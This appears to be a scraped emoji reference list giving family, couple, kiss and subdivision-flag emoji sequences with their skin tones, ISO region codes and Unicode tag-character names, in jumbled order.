👩🏽👨🏽👦🏽👶🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Boy: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👨🏾👦🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏻👨🏻👧🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone
👩🏽👨🏽👧🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone
👩🏻👨🏻👦🏻👶🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Baby: Light Skin Tone
👩🏼👨🏼👦🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏼👨🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏻👨🏻👧🏻👦🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
👩🏼👨🏼👧🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏽👨🏽👧🏽👦🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾👨🏾👧🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👨🏿👧🏿👦🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
👩🏻👨🏻👧🏻👧🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
👩🏽👨🏽👧🏽👧🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
👩🏿👨🏿👧🏿👧🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone, Girl: Dark Skin Tone
👩🏻👨🏻👧🏻👶🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
👩🏼👨🏼👧🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👨🏽👧🏽👶🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👨🏾👧🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏿👨🏿👧🏿👶🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
👩🏻👨🏻👶🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone
👩🏼👨🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏻👨🏻👶🏻👦🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
👩🏼👨🏼👶🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏾👨🏾👶🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👨🏿👶🏿👦🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
👩🏻👨🏻👶🏻👧🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
👩🏼👨🏼👶🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏽👨🏽👶🏽👧🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone, Girl: Medium Skin Tone
👩🏿👨🏿👶🏿👧🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone, Girl: Dark Skin Tone
👩🏻👨🏻👶🏻👶🏻 Family - Woman: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone, Baby: Light Skin Tone
👩🏼👨🏼👶🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👨🏽👶🏽👶🏽 Family - Woman: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👨🏾👶🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏿👨🏿👶🏿👶🏿 Family - Woman: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone, Baby: Dark Skin Tone
👩🏼👩🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏻👩🏻👦🏻👧🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
👩🏼👩🏼👦🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏾👩🏾👦🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👩🏿👦🏿👦🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin Tone
👩🏿👩🏿👦🏿👶🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone, Baby: Dark Skin Tone
👩🏽👩🏽👦🏽👧🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone, Girl: Medium Skin Tone
👩🏾👩🏾👦🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩🏿👩🏿👦🏿👧🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone, Girl: Dark Skin Tone
👩🏻👩🏻👦🏻👶🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone, Baby: Light Skin Tone
👩🏼👩🏼👦🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👩🏽👦🏽👶🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👩🏾👦🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏻👩🏻👧🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone
👩🏼👩🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏽👩🏽👦🏽👦🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Boy: Medium Skin Tone, Boy: Medium Skin Tone
👩🏽👩🏽👧🏽👦🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Boy: Medium Skin Tone
👩🏻👩🏻👧🏻👧🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
👩🏽👩🏽👧🏽👧🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
👩🏾👩🏾👧🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩🏿👩🏿👧🏿👧🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Girl: Dark Skin Tone
👩🏻👩🏻👧🏻👶🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
👩🏼👩🏼👧🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👩🏽👧🏽👶🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👩🏾👧🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏿👩🏿👧🏿👶🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
👩🏻👩🏻👶🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone
👨🏾👩🏾👧🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩🏼👩🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👩🏽👶🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👩🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏿👩🏿👶🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone
👩🏻👩🏻👶🏻👦🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
👩🏼👩🏼👶🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
👩🏽👩🏽👶🏽👦🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾👩🏾👶🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👩🏿👩🏿👶🏿👦🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
👩🏻👩🏻👶🏻👧🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
👩🏽👩🏽👶🏽👧🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Girl: Medium Skin Tone
👩🏾👩🏾👶🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
👩🏿👩🏿👶🏿👧🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Girl: Dark Skin Tone
👩🏻👩🏻👶🏻👶🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Baby: Light Skin Tone
👩🏼👩🏼👶🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
👩🏽👩🏽👶🏽👶🏽 Family - Woman: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Baby: Medium Skin Tone
👩🏾👩🏾👶🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👩🏿👩🏿👶🏿👶🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Baby: Dark Skin Tone
👩🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Maluku Islands (ID-ML)
👩🏿👶🏿👧🏿 Family - Woman: Dark Skin Tone, Baby: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Southern Denmark (DK-83)
🏴 Flag for Skopje (MK-85)
👨🏼❤️💋👩 Kiss - Man: Medium-Light Skin Tone, Woman
🏴 Flag for Beja (PT-02)
🏴 Flag for Sardinia (IT-88)
🏴 Flag for Bavaria (DE-BY)
🏴 Flag for East New Britain (PG-EBR)
🏴 Flag for Trentino-South Tyrol (IT-32)
🏴 Flag for Tennessee (US-TN)
🏴 Flag for Saskatchewan (CA-SK)
🏴 Flag for Funafuti (TV-FUN)
🏴 Flag for Gorno-Badakhshan (TJ-GB)
🏴 Flag for Banaadir (SO-BN)
🏴 Flag for Radenci (SI-100)
🏴 Flag for Baden-Württemberg (DE-BW)
👩🏿👧🏿 Family - Woman: Dark Skin Tone, Girl: Dark Skin Tone
🏴 Flag for Carabobo (VE-G)
Zero Width Joiner
🏴 Flag for Nakuru (KE-31)
🏴 Flag for Maritime (TG-M)
🏴 Flag for Borno (NG-BO)
🏴 Flag for Transnistria (MD-SN)
🏴 Flag for Tehran (IR-07)
🏴 Flag for Dagestan (RU-DA)
🏴 Flag for Al Wusta (OM-WU)
🏴 Flag for Ústecký kraj (CZ-42)
🏴 Flag for Kuala Lumpur (MY-14)
🏴 Flag for Ayacucho (PE-AYA)
🏴 Flag for Kiev (UA-30)
🏴 Flag for Saint Philip (AG-08)
🏴 Flag for Mdina (MT-29)
🏴 Flag for Northern Ireland (GB-NIR)
🏴 Flag for Auvergne-Rhône-Alpes (FR-ARA)
🏴 Flag for Durango (MX-DUR)
👨🏼👩🏼👧🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Eastern (LK-5)
🏴 Flag for Ogun (NG-OG)
🏴 Flag for Jafara (LY-JI)
🏴 Flag for Skåne (SE-M)
👨🏽👩🏽👧🏽👦🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Boy: Medium Skin Tone
👩🏾👩🏾👧🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Mato Grosso do Sul (BR-MS)
🏴 Flag for Santa Rosa (GT-SR)
👨🏼👩🏼👧🏼👧🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Braslovče (SI-151)
🏴 Flag for Madeira (PT-30)
🏴 Flag for San Vicente (SV-SV)
🏴 Flag for Alborz (IR-32)
🏴 Flag for Fa’asaleleaga (WS-FA)
👨🏼👨🏼👦🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Newfoundland and Labrador (CA-NL)
🏴 Flag for Peloponnese (GR-J)
🏴 Flag for Sint Maarten (NL-SX)
🏴 Flag for St. Julian’s (MT-48)
🏴 Flag for Adamawa (NG-AD)
👩🏿👩🏿👧🏿👦🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for São Tomé (ST-S)
👩🏻👩🏻👧🏻👦🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Auce (LV-010)
🏴 Flag for Cordillera Administrative (PH-15)
🏴 Flag for Fukui (JP-18)
👨🏿👩🏿👦🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Kakheti (GE-KA)
🏴 Flag for Jeju (KR-49)
🏴 Flag for Souss-Massa-Drâa (MA-13)
🏴 Flag for Inčukalns (LV-037)
🏴 Flag for French Southern Territories (FR-TF)
🏴 Flag for Quintana Roo (MX-ROO)
👩🏻👶🏻👶🏻 Family - Woman: Light Skin Tone, Baby: Light Skin Tone, Baby: Light Skin Tone
👨🏾👨🏾👦🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Győr-Moson-Sopron (HU-GS)
👩🏿👩🏿👧🏿 Family - Woman: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone
👩🏻👩🏻👦🏻👦🏻 Family - Woman: Light Skin Tone, Woman: Light Skin Tone, Boy: Light Skin Tone, Boy: Light Skin Tone
Shibuya
👩❤️👨🏽 Couple With Heart - Woman, Man: Medium Skin Tone
🏴 Flag for Gaga’ifomauga (WS-GI)
🏴 Flag for Nord-Est (HT-NE)
🏴 Flag for Central Singapore (SG-01)
🏴 Flag for Tungurahua (EC-T)
# Number Sign
👨🏻👨🏻👶🏻👦🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
1 Digit One
🏴 Flag for Tarija (BO-T)
👨🏾👩🏾👧🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Cibitoke (BI-CI)
🏴 Flag for Upper South Province (MV-US)
🏴 Flag for Canillo (AD-02)
🏴 Flag for Bamyan (AF-BAM)
🏴 Flag for Encamp (AD-03)
🏴 Flag for Northern Mariana Islands (US-MP)
🏴 Flag for Babīte (LV-012)
🏴 Flag for Cotopaxi (EC-X)
🏴 Flag for Ngounié (GA-4)
* Asterisk
Tag Latin Small Letter Z
🏴 Flag for La Massana (AD-04)
Tag Digit Three
👩🏼❤️💋👩🏻 Kiss - Woman: Medium-Light Skin Tone, Woman: Light Skin Tone
🏴 Flag for Berane (ME-03)
👨🏿❤️💋👨🏽 Kiss - Man: Dark Skin Tone, Man: Medium Skin Tone
🏴 Flag for El Valle (DO-37)
👩🏾❤️👩🏻 Couple With Heart - Woman: Medium-Dark Skin Tone, Woman: Light Skin Tone
🏴 Flag for Baringo (KE-01)
🏴 Flag for Amanat Al Asimah (YE-SA)
👨🏼👨🏼👶🏼👦🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
Tag Digit Two
🏴 Flag for Senglea (MT-20)
🕴️♀️ Woman in Business Suit Levitating
🏴 Flag for Haut-Mbomou (CF-HM)
Tag Digit One
Tag Digit Four
🏴 Flag for Absheron (AZ-ABS)
6 Digit Six
🏴 Flag for Savannakhet (LA-SV)
🏴 Flag for Kayes (ML-1)
🏴 Flag for Abu Dhabi (AE-AZ)
🏴 Flag for Asturias (ES-AS)
🏴 Flag for Kirkuk (IQ-KI)
👩❤️👩🏽 Couple With Heart - Woman, Woman: Medium Skin Tone
🏴 Flag for Berlin (DE-BE)
8 Digit Eight
🏴 Flag for Escaldes-Engordany (AD-08)
🏴 Flag for Ningxia (CN-64)
🏴 Flag for Cañar (EC-F)
🏴 Flag for Ajman (AE-AJ)
🕴🏻♀️ Woman in Business Suit Levitating: Light Skin Tone
👨🏻❤️💋👩 Kiss - Man: Light Skin Tone, Woman
Tag Digit Eight
🏴 Flag for Fars (IR-14)
🏴 Flag for Fujairah (AE-FU)
👨🏼👦🏼👦🏼 Family - Man: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Virovitica-Podravina (HR-10)
Tag Latin Small Letter I
7 Digit Seven
Tag Digit Seven
Tag Latin Small Letter E
👩🏼👩🏼👧🏼👦🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Ratak Chain (MH-T)
🏴 Flag for Sharjah (AE-SH)
Tag Latin Small Letter F
🏴 Flag for Vilniaus Municipality (LT-57)
🏴 Flag for Westfjords (IS-4)
🏴 Flag for British Columbia (CA-BC)
4 Digit Four
🏴 Flag for Balkh (AF-BAL)
👨👶👦 Family: Man, Baby, Boy
🏴 Flag for Hsinchu County (TW-HSQ)
👩👶👧 Family: Woman, Baby, Girl
🏴 Flag for Jalisco (MX-JAL)
🏴 Flag for Kitui (KE-18)
🏴 Flag for Azores (PT-20)
🏴 Flag for Manipur (IN-MN)
🏴 Flag for Badakhshan (AF-BDS)
👩🏻❤️👩🏼 Couple With Heart - Woman: Light Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Ordino (AD-05)
👩🏽❤️💋👩 Kiss - Woman: Medium Skin Tone, Woman
🏴 Flag for Baghlan (AF-BGL)
🏴 Flag for Cross River (NG-CR)
🏴 Flag for Colorado (US-CO)
Tag Latin Small Letter T
🏴 Flag for Radoviš (MK-64)
🏴 Flag for Wellington (NZ-WGN)
👨🏽👨🏽👶🏽👦🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Kurdistan (IR-16)
👨🏽❤️💋👨🏿 Kiss - Man: Medium Skin Tone, Man: Dark Skin Tone
Tag Latin Small Letter S
👩👶👶 Family: Woman, Baby, Baby
🏴 Flag for Daykundi (AF-DAY)
👨🏻❤️💋👨🏾 Kiss - Man: Light Skin Tone, Man: Medium-Dark Skin Tone
🏴 Flag for Farah (AF-FRA)
Tag Latin Small Letter Q
🏴 Flag for Guatemala (GT-GU)
🏴 Flag for Thurgau (CH-TG)
🏴 Flag for Chechen (RU-CE)
Tag Digit Five
🏴 Flag for Ghōr (AF-GHO)
🏴 Flag for Vienna (AT-9)
🏴 Flag for Ghazni (AF-GHA)
Tag Latin Small Letter U
🏴 Flag for Gaborone (BW-GA)
Tag Latin Small Letter Y
Cancel Tag
Tag Latin Small Letter W
👩🏽❤️👩🏿 Couple With Heart - Woman: Medium Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Amazonas (CO-AMA)
Tag Latin Small Letter N
👩❤️💋👩🏽 Kiss - Woman, Woman: Medium Skin Tone
👨👶 Family: Man, Baby
🏴 Flag for Burgenland (AT-1)
🏴 Flag for Helmand (AF-HEL)
Tag Digit Six
🏴 Flag for Jowzjan (AF-JOW)
🧕♀️ Woman With Headscarf
Tag Latin Small Letter B
Tag Digit Zero
🏴 Flag for Herat (AF-HER)
🏴 Flag for Saint Mark (GD-05)
3 Digit Three
Tag Latin Small Letter G
🕴🏾♀️ Woman in Business Suit Levitating: Medium-Dark Skin Tone
👩🏽❤️💋👨🏽 Kiss - Woman: Medium Skin Tone, Man: Medium Skin Tone
🏴 Flag for Alaska (US-AK)
Tag Latin Small Letter R
🏴 Flag for Lautém (TL-LA)
🏴 Flag for Kabul (AF-KAB)
👨❤️💋👨🏿 Kiss - Man, Man: Dark Skin Tone
🧕♂️ Man With Headscarf
Tag Latin Small Letter V
Tag Latin Small Letter D
🏴 Flag for Kandahar (AF-KAN)
🏴 Flag for Kapisa (AF-KAP)
🏴 Flag for Saint Roman (MC-SR)
🏴 Flag for Hiiu (EE-39)
Tag Latin Small Letter M
🏴 Flag for Khost (AF-KHO)
🧕🏻♂️ Man With Headscarf: Light Skin Tone
🏴 Flag for Kunduz (AF-KDZ)
👩🏿❤️👨 Couple With Heart - Woman: Dark Skin Tone, Man
🏴 Flag for South Dakota (US-SD)
🏴 Flag for Badghis (AF-BDG)
🏴 Flag for Southern (IS-8)
🏴 Flag for Kunar (AF-KNR)
👨👨👶👶 Family: Man, Man, Baby, Baby
🏴 Flag for Tokyo (JP-13)
🏴 Flag for Laghman (AF-LAG)
🧕🏽♂️ Man With Headscarf: Medium Skin Tone
🏴 Flag for Logar (AF-LOG)
5 Digit Five
Tag Latin Small Letter C
🏴 Flag for Faryab (AF-FYB)
Tag Latin Small Letter P
🏴 Flag for Nangarhar (AF-NAN)
Tag Digit Nine
🏴 Flag for Navarra Chartered Community (ES-NC)
👩🏼👦🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
🏴 Flag for Nayarit (MX-NAY)
🏴 Flag for Pernambuco (BR-PE)
🏴 Flag for Campania (IT-72)
🧕🏾♂️ Man With Headscarf: Medium-Dark Skin Tone
👩🏽❤️💋👩🏾 Kiss - Woman: Medium Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Nuristan (AF-NUR)
👨👨👧👶 Family: Man, Man, Girl, Baby
🏴 Flag for West New Britain (PG-WBK)
👨🏼👩🏼👧🏼👦🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Upper Demerara-Berbice (GY-UD)
👨❤️💋👩 Kiss - Man, Woman
🏴 Flag for Afar (ET-AF)
🏴 Flag for Parwan (AF-PAR)
🏴 Flag for Nimruz (AF-NIM)
🏴 Flag for Karlovac (HR-04)
🏴 Flag for Paktia (AF-PIA)
🧕🏿♂️ Man With Headscarf: Dark Skin Tone
🧕🏼♂️ Man With Headscarf: Medium-Light Skin Tone
🏴 Flag for Baja California (MX-BCN)
🏴 Flag for Paktika (AF-PKA)
🏴 Flag for Phoenix Islands (KI-P)
Tag Latin Small Letter O
🏴 Flag for Panjshir (AF-PAN)
🏴 Flag for Ticino (CH-TI)
🏴 Flag for Žirovnica (SI-192)
🏴 Flag for Halland (SE-N)
Tag Latin Small Letter J
👩🏽❤️💋👩🏻 Kiss - Woman: Medium Skin Tone, Woman: Light Skin Tone
👨🏾👨🏾👶🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👨🏿👨🏿👶🏿👦🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Northern Bahr el Ghazal (SS-BN)
👨🏽❤️💋👩 Kiss - Man: Medium Skin Tone, Woman
🏴 Flag for Basse-Kotto (CF-BK)
👨❤️👨🏻 Couple With Heart - Man, Man: Light Skin Tone
👨🏽❤️👨 Couple With Heart - Man: Medium Skin Tone, Man
🏴 Flag for Butnan (LY-BU)
👩👶 Family: Woman, Baby
🏴 Flag for Sabaragamuwa (LK-9)
🏴 Flag for Samangan (AF-SAM)
🏴 Flag for Nukulaelae (TV-NKL)
🏴 Flag for Ras al-Khaimah (AE-RK)
🏴 Flag for Ceuta (ES-CE)
🏴 Flag for Dubai (AE-DU)
👨🏻👨🏻👶🏻👧🏻 Family - Man: Light Skin Tone, Man: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Okinawa (JP-47)
🏴 Flag for Sar-e Pol (AF-SAR)
👩🏼👩🏼👦🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
Tag Latin Small Letter L
🏴 Flag for Urozgan (AF-URU)
9 Digit Nine
👩🏾👦🏾 Family - Woman: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
👨❤️💋👨🏽 Kiss - Man, Man: Medium Skin Tone
🏴 Flag for Saint Joseph (DM-06)
🏴 Flag for Saint John (AG-04)
🏴 Flag for Vichada (CO-VID)
🏴 Flag for Ngarchelong (PW-218)
🏴 Flag for Arkhangelsk (RU-ARK)
🏴 Flag for Zabul (AF-ZAB)
🏴 Flag for Saint George (AG-03)
🏴 Flag for Lombardy (IT-25)
👨🏻❤️💋👨🏻 Kiss - Man: Light Skin Tone, Man: Light Skin Tone
🏴 Flag for Pardubický kraj (CZ-53)
🏴 Flag for Saint Paul (AG-06)
🏴 Flag for Trà Vinh (VN-51)
👩👨👶👧 Family: Woman, Man, Baby, Girl
🏴 Flag for South Gyeongsang (KR-48)
🏴 Flag for Saint Mary (AG-05)
🏴 Flag for North Aegean (GR-K)
👩👩👶👧 Family: Woman, Woman, Baby, Girl
🏴 Flag for Zamora-Chinchipe (EC-Z)
🏴 Flag for Masaya (NI-MS)
🏴 Flag for Gilbert Islands (KI-G)
🏴 Flag for Chihuahua (MX-CHH)
👨🏼👨🏼👶🏼👧🏼 Family - Man: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏽👨🏽👶🏽👧🏽 Family - Man: Medium Skin Tone, Man: Medium Skin Tone, Baby: Medium Skin Tone, Girl: Medium Skin Tone
